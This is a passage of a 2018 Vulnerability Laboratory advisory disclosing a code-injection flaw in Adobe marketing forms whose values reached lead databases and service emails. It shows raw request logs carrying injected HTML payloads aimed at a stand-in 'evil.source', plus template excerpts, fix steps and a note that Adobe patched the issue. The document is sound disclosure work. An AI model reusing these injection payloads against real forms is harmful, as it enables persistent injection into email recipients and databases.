https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273

3. PoC: Execution Points
https://www.adobe.com/de/modal-offers/how-to-data-to-customer-intelligence.html
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea733a
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D

Note: The following example shows
1. Enterprise to stats adobe
2. After that, a sync to the subdomain service occurs
3. Then the data is merged into the info adobe service
4. Some syncs and backups later, the content is inside the main lead database

--- PoC Session Logs (POST Inject) ---
Status: 200[OK]
GET
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit?callback=jQuery1102013829541567907688_1518951745795&id=1&l=3&d=%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers%2Fadobe_econsultancy_digital_trends_2017.html&Form1%5B14%5D=822&Form1%5B15%5D=829&Form1%5B10%5D=a%22%3E%3C+src%3Devil.source%3E%3C%3E&Form1%5B33%5D=https%3A%2F%2Fwww.test.de%2F%22%3E%3Crc%3Devil.source%3E%3C%3E&Form1%5B95%5D=2746&Form1%5B8%5D=c%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B9%5D=b%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B1%5D=tester23%40evolutionsec.com&Form1%5B11%5D=01925723572723&Form1%5B16%5D=31337&Form1%5B18%5D=462&Form1%5B19%5D=2922&Form1%5B20%5D=72&Form1%5B130%5D=&Form1%5B35%5D=0&Form1%5B84%5D=0&Form1%5B84%5D=1&Form1%5B85%5D=0&Form1%5B85%5D=1&Form1%5B87%5D=0&Form1%5B87%5D=1&Form1%5B86%5D=0&Form1%5B77%5D=1&Form1%5B78%5D=1&Form1%5B79%5D=1&Form1%5B80%5D=&Form1%5B89%5D=&Form1%5B6%5D=marketing_web_form&Form1%5B7%5D=whitepaper_form&Form1%5B31%5D=EXPERIENCEMANAGERSOLN&Form1%5B36%5D=70114000002Cc8OAAS&Form1%5B37%5D=7011O000002Oq5lQAC&Form1%5B38%5D=&Form1%5B39%5D=&Form1%5B40%5D=&Form1%5B44%5D=&Form1%5B45%5D=&Form1%5B46%5D=&Form1%5B47%5D=&Form1%5B48%5D=&Form1%5B49%5D=&Form1%5B50%5D=&Form1%5B90%5D=DESBU&Form1%5B102%5D=&Form1%5B104%5D=&Form1%5B109%5D=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&Form1%5B115%5D=&Form1%5B116%5D=&Form1%5B122%5D=&Form1%5B123%5D=&Form1%5B124%5D=&Form1%5B125%5D=&Form1%5B126%5D=&Form1%5B127%5D=&Form1%5B128%5D=&Form1%5B129%5D=&Form1%5B120%5D=&ajax=faas-form-1&_=1518951745799

Mime Type[application/json]
Request Header:
Host[apps.enterprise.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
Accept[*/*]

Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]

Connection[keep-alive]
Response Header:
content-type[application/json; charset=UTF-8]
content-length[445]
server[Apache]
expires[Thu, 19 Nov 1981 08:52:00 GMT]
cache-control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
pragma[no-cache]
access-control-allow-origin[*]

set-cookie[AWSALB=A3qFidf0O5y8FJMPYy8yPurGXw6U0pm1vsgi9RZbDaOZjkaQdp9cdZICl9KMU2yldLT8dDmkmf0oheGoizsb/x4D/1If/GfJZbDXNeZi0pkdbeLLupJo4azCKowa;

Expires=Sun, 25 Feb 2018 11:05:26 GMT; Path=/
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=offers.adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=apps.enterprise.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=offers.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=apps.enterprise.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure]
X-Firefox-Spdy[h2]

Status: 200[OK]
POST
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273

Mime Type[image/gif]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]

Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38
&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Content-Length[2181]
Content-Type[text/plain;charset=UTF-8]
Origin[https://offers.adobe.com]
DNT[1]
Connection[keep-alive]
POST data:
AQB[1]
ndh[1]
pf[1]
t[18%2F1%2F2018%2012%3A5%3A28%200%20-60]
mid[70200303268859877472538284957896691642]
aid[2D44AEA10530CAFD-40000305C000F505]
aamlh[6]
ce[UTF-8]
cdp[2]
fpCookieDomainPeriods[2]
pageName[faaswc%3AFaaS%20Form%20Submission]

g[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3D
EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21]
c.[]
adb.[]
app.[]
name[1]
namespace[faaswc]
category[webComponent]
version[3.0.0]
.app[]
state.[]

location[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html
%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781
%21b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]
.state[]
.adb[]
faaswc.[]
form.[]
id[1]
.form[]
.faaswc[]
.c[]
aamb[RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y]
c36[unspecified]

c37[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3
DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D70114000002Cc8O
AAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21b%21%21g%21%21
content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]
c38[form_1]
c39[linked_in%7Cjs%7Cfaas_submission%7Csfdc%7Cdemandbase]

c42[%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers
%2Fadobe_econsultancy_digital_trends_2017.html%3Ffaas_unique_submission_id%3D78D1E035-F1C6-4261-4EA0-C82041EB2A11]
a.[]
activitymap.[]

page[offers.adobe.com%3Ade%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017.html]
link[Abschicken]
region[faas-form-1]
pageIDType[1]
.activitymap[]
.a[]
s[1366x768]
c[24]
j[1.8.5]
v[N]
k[Y]
bw[1366]
bh[564]

-g[b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]
mcorgid[9E1005A551ED61CA0A490D45%40AdobeOrg]
AQE[1]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
Expires[Sat, 17 Feb 2018 11:05:28 GMT]
Last-Modified[Mon, 19 Feb 2018 11:05:28 GMT]
Cache-Control[no-cache, no-store, max-age=0, no-transform, private]
Pragma[no-cache]
ETag["5A895DF8-FEF7-4E72B58E"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www56]
Content-Length[43]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[image/gif]

Status: 200[OK]
GET
https://sstats.adobe.com/b/ss/adbadobenonacdcprod/10/JS-2.5.0-D7QN/s38633784893508?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=18%2F1%2F2018%2012%3A5%3A28%200%20-60&cid.&email_hash.&id=ff01e8531641c6ec1bcec21c031b44eb&as=1&.email_hash&faas_unique_submission_id.&id=78D1E035-F1C6-4261-4EA0-C82041EB2A11&as=1&.faas_unique_submission_id&.cid&d.&nsid=0&jsonv=1&.d&D=D%3D&mid=70200303268859877472538284957896691642&aid=2D44AEA10530CAFD-40000305C000F505&aamlh=6&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&g=https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21&events=event109&v28=offers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html&v69=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&v87=462&v88=72&v116=1&v147=78D1E035-F1C6-4261-4EA0-C82041EB2A11&v148=ff01e8531641c6ec1bcec21c031b44eb&pe=lnk_o&pev2=FaaS%20Form%20Submission&c.&a.&activitymap.&page=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&link=d2d1d3d2A1d1F2d22j1-Abschicken&region=other&pageIDType=1&.activitymap&.a&.c&-g=b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&AQE=1

Mime Type[application/x-javascript]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]

Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]

Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-1519556547%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-40000305C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Adigitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C1518953728730%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.com%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%3B;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d34f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=%5B%5BB%5D%5D; faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb;
faas_form_1_status=completed]
Connection[keep-alive]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
ETag["5A895DF8-68DE-70672227"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www28]
Content-Length[6393]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[application/x-javascript]

Vulnerable Source: Service Email #1 (Test)
<tbody><tr><td class="mobile-spacer" style="width:60px;"
width="60">&nbsp;</td>
<td class="headline" style="color:#2F303D; font-family:serenity,
Helvetica Neue,
Helvetica, Verdana, Arial, sans-serif; font-size:30px; line-height:25px;
padding-top:40px;"
align="center"><strong>STAND OUT WITH GREAT
EXPERIENCES.</strong></td>
<td class="mobile-spacer" style="width:60px;" width="60">&nbsp;</td></tr>
<tr><td class="mobile-spacer" style="width:60px;" width="60">&nbsp;</td>
<td style="color:#2F303D; font-family:adobe-clean, Helvetica Neue Light,
Helvetica Light,
Helvetica, Verdana, Arial, sans-serif; font-size:16px; font-weight:100;
line-height:19px; padding-top:12px;"
align="center">Dear Mr. "<[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME])" <,<br=""><br>The
experience is currently growing into the most important factor in
customer retention. Experiences that are personal, inspiring and
consistent on every channel and device – that is now your biggest
competitive advantage.
<br><br>Visit our Adobe Summit EMEA 2018. Experience with us what it
really takes to create exceptional digital experiences. Learn from
companies such as <strong>Sky, DHL</strong> or
<strong>Raiffeisen</strong> how they have realised these new kinds of
experience offerings, which already set their business models apart
from the competition today.

Vulnerable Source: Service Email #2 (Test)
<td class="mobile" style="display: none; max-height:0; font-size:0;
height:0;padding:0;margin:0;width:0;" valign="top">
<a
href="http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46&p1=7011O000002bSn9QAE&p2=0031400002mfNt5AAE"

target="_blank" style="color:#0099ff;"><img class="mobile-image"
alt="Because we keep innovating, we keep leading."
src="https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketing/events/images/other/49460e.de.because-we-keep-innovating-we-keep-leading.640x597.jpg"

style="vertical-align:top;
overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;"
width="320" vspace="0" hspace="0" height="340" border="0">
</a>
</td>
<!--<![endif]-->
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td class="mobile-padding"
style="padding-left:30px;padding-right:30px;padding-top:14px;"
valign="top" bgcolor="#000000">
<table style="mso-cellspacing: 0px; mso-padding-alt: 0px 0px 0px 0px;
width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td class="mobile-text" style="color:#ffffff; font-family:Arial,
Helvetica, sans-serif; font-size:12px; line-height:18px;
padding-top:12px;" valign="top">
Dear Mr. "%20"[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME],<br=""><br>Forrester rates Adobe as a Leader in web analytics.
Read in <i>The Forrester Wave<sup
style="line-height:95%;">™</sup>: Web Analytics, Q4 2017</i> why
we continue to set the tone
– with meaningful and actionable insights for all
employees in the company.
</tr>

Reference(s):
https://www.adobe.com
http://t.info.adobesystems.com
http://m.info.adobesystems.com
https://offers.adobe.com
https://sstats.adobe.com
https://apps.enterprise.adobe.com
http://landing.adobe.com
http://t-info.mail.adobe.com
https://offflivestream.creativecloud.adobeevents.com
https://summit-emea.adobe.com

Solution – Fix & Patch:
=======================
1. Restrict and filter the input fields and disallow script code tags in
the submitted values.
2. Encode the input values for their output context when the POST request
is processed, so that malformed injects never reach the templates.
3. Parse and sanitize the firstname, lastname and company values before
they are rendered in outgoing emails, across all Adobe service templates.
4. Implement a filter mechanism with exception handling to sanitize
content delivered from the external service to the sub-service and on to
the main lead database.
5. Raise awareness among employees by explaining the specific impact of
the attack points, to prevent the manual delivery of injected content.
6. Develop a process to remove compromised records from the main
database and from backups.
7. Ensure that a web application firewall captures these incidents and
alerts or reacts, so that an attacker is not able to move through the
separate database segments.

The reported URLs have already been reported to, and disarmed by, the
Adobe Systems PSIRT and developer team. The issue has been patched in
multiple functions. The forms are already restricted, and the case
scenario has been delivered in full transparency to ensure the problem
becomes visible to Adobe.
(Example:
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)

Security Risk:
==============
The security risk of the code injection vulnerability in the Adobe web
services is estimated as high.

Credits & Authors:
==================
Benjamin K.M. (Vulnerability Laboratory Core Research
Team)[[email protected]] –
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable in
any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs or
its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental or consequential damages, so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any licenses,
policies, deface websites, hack into databases or trade with stolen data.
We have no need for criminal activities or membership requests. We do not
publish advisories or vulnerabilities of religious, militant and racist
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails, phone numbers, conversations or anything else to
journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com – www.vulnerability-db.com – www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php – vulnerability-lab.com/list-of-bug-bounty-programs.php – vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php – vulnerability-lab.com/rss/rss_upcoming.php – vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab – facebook.com/VulnerabilityLab – youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file,
resources or information requires authorization from Vulnerability
Laboratory. Permission to electronically redistribute this alert in its
unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other information
on this website are trademarks of the vulnerability-lab team and the
specific authors or managers. To record, list, modify, use or edit our
material, contact ([email protected]) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory – [Evolution Security GmbH]™


VULNERABILITY LABORATORY – RESEARCH TEAM
SERVICE: www.vulnerability-lab.com